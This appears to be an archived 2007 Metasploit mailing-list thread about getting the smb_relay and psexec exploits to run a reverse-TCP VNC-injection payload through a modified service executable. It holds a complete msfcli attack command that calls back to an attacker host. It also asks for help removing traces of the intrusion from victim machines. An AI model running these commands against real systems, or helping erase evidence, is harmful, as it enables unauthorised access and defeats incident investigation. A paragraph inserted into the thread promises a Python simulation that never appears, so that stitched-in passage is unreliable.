Metasploit mailing list archives

Re: smb_relay and vncinject


From: sigtrap at sigtrap.org (sigtrap)
Date: Wed, 21 Nov 2007 14:24:50 +0100

Hi,
I now have a new "service template.exe". I managed to steal 10 minutes 
from my friend Magnus Br?ding, in which he threw together a service 
executable template PoC (yes, we're sorry it's bloated :-)) It's 
attached with the password:
"password" (without the quotes)

Got it? ;-)

If you backup the original template.exe and use this instead, the 
exploits psexec and smb_relay will work as intended (other exploits, 
that don't expect a service exe, probably won't work).

Eg:
./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7 PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E

The service is created and starts.
The payload is executed in a new thread.
The service controller *doesn't* kill the process after 30 seconds 
anymore, as it does with the normal template.exe.
When you terminate the vncclient the payload terminates the process 
through the "EXITFUNC=process".
The Windows service MMC snap-in will now report the created service 
as "stopped".

If we could now just make the handler (i.e. the one that starts the 
VNC client on the attacking computer) report back to the exploit when 
the payload on the victim computer has ended (and thus its process has 
also terminated in this case), it would be easy to remove the service 
and executable on the victim computer, thereby leaving no bigger trace 
behind of the intrusion. I don't know how to do this, but it would be 
really great if someone did.

Regards
//Sigtrap


-----Original Message-----
From: H D Moore <hdm at metasploit.com>
To: framework at metasploit.com
Date: Mon, 10 Sep 2007 10:26:01 -0500
Subject: Re: [framework] Re: smb_relay and vncinject

Patrick nailed it. The SCM seems to be unhappy if the service start 
function doesn't return. To resolve this, we need to spawn a new thread 
from within the wrapper exe and return a successful result back. Is anyone 
familiar with writing EXE-based Windows services?

-HD

On Monday 10 September 2007 09:49, Patrick Webster wrote:
It would appear that Windows is killing your VNC service after 30
seconds because the service did not return a successful start signal
back to the OS within this period.
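As an added illustration (not code from this thread, from Metasploit, or from the template attached above), the following Python simulation models the exchange the messages describe: a stand-in SCM enforcing a (scaled-down) start timeout, the old-style start function that runs the work inline and never reports RUNNING, and the fixed one that reports RUNNING, spawns a worker thread and returns, after which the process exiting is recorded as STOPPED. The state names, the 0.3 s timeout, the 0.6 s work duration and the queue used as a "status pipe" are simulation assumptions, not the Win32 service API.

```python
import queue
import threading
import time

# Simulation only: the state names mirror the Win32 SERVICE_* states, but the
# "SCM" below is a stand-in, not the Windows Service Control Manager.
START_PENDING, RUNNING, STOPPED = "START_PENDING", "RUNNING", "STOPPED"
START_TIMEOUT = 0.3   # stands in for the SCM's 30-second start timeout
WORK_DURATION = 0.6   # how long the stand-in "payload" keeps running

class ServiceProcess:
    def __init__(self, status_pipe):
        self.status_pipe = status_pipe   # service -> SCM status reports

    def set_status(self, state):
        self.status_pipe.put(state)

    def do_work(self):
        # Stand-in for the payload. With EXITFUNC=process the whole process
        # ends when the payload does, which the SCM then records as STOPPED.
        time.sleep(WORK_DURATION)
        self.set_status(STOPPED)

def blocking_service_main(svc):
    # Old template: the work runs inside the start function, so RUNNING is
    # never reported before the SCM's deadline passes.
    svc.set_status(START_PENDING)
    svc.do_work()

def threaded_service_main(svc):
    # Fixed template: report RUNNING, run the work on a new thread, return.
    svc.set_status(START_PENDING)
    threading.Thread(target=svc.do_work, daemon=True).start()
    svc.set_status(RUNNING)

def run_under_scm(service_main):
    """Run service_main under the simulated SCM; return STOPPED or KILLED_BY_SCM."""
    pipe = queue.Queue()
    svc = ServiceProcess(pipe)
    threading.Thread(target=service_main, args=(svc,), daemon=True).start()
    deadline = time.monotonic() + START_TIMEOUT
    state = START_PENDING
    while state == START_PENDING:       # wait for RUNNING before the deadline
        try:
            state = pipe.get(timeout=max(0.0, deadline - time.monotonic()))
        except queue.Empty:
            return "KILLED_BY_SCM"      # unresponsive start: SCM kills the process
    while state != STOPPED:             # running: wait for the process to exit
        state = pipe.get()
    return STOPPED
```

Running the blocking variant reproduces the kill Patrick diagnosed; the threaded variant stays up until the worker finishes and then ends as STOPPED, which is what the services snap-in shows.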
-------------- next part --------------
A non-text attachment was scrubbed...
Name: template.exe.bin.pgp
Type: application/octet-stream
Size: 224107 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071121/5de116d9/attachment.obj>
